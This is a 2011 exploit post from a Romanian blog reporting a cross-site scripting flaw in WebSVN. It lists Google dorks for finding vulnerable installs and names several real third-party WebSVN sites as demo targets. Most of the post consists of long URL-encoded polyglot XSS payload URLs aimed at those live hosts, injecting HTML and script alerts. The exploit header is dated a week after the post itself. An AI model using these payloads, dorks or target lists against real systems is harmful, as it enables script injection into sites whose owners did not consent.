sâmbătă, 17 decembrie 2011

WebSVN Cross Site Scripting

# Exploit Title: WebSVN Cross Site Scripting
# Date: 24.12.2011
# Author: Sony
# Software Link: http://websvn.tigris.org/
# Google Dorks: inurl:/svn/listing.php?repname= or intext:"Powered by WebSVN"
# Version: ???
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
..................................................................

Demo:

We have some code (oh, ugly code):

http://codepad.org/pVCU96rQ

http://lostsidedead.com/svn/comp.php?repname=haze&path=&

Put our code in the "With Path:" and press Enter. Or open http://lostsidedead.com/svn/, click on the afftol and on the Compare Paths.


http://svn.suretecsystems.com/svn/comp.php?repname=aberdeen.pm&path=&

http://ciclope.fi.upm.es/svn/comp.php?repname=Ciclope+SVN&path=&

http://sheelabs.gamemod.net/svn/comp.php?repname=sheelabs&path=&

http://dev-svn.seasr.org/WebSVN/comp.php?repname=Components&path=%2F&

or :

http://code.clearfoundation.com/svn/revision.php?repname=l7-filter&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&rev=324&peg=324

http://vector.ucsd.edu/svn/comp.php?repname=vector&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E

or

http://christianserving.org/websvn/diff.php?repname=TruePreview&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E

Video : (because it's a specific xss)

0 comentarii:

Trimiteţi un comentariu

Reţineţi: Numai membrii acestui blog pot posta comentarii.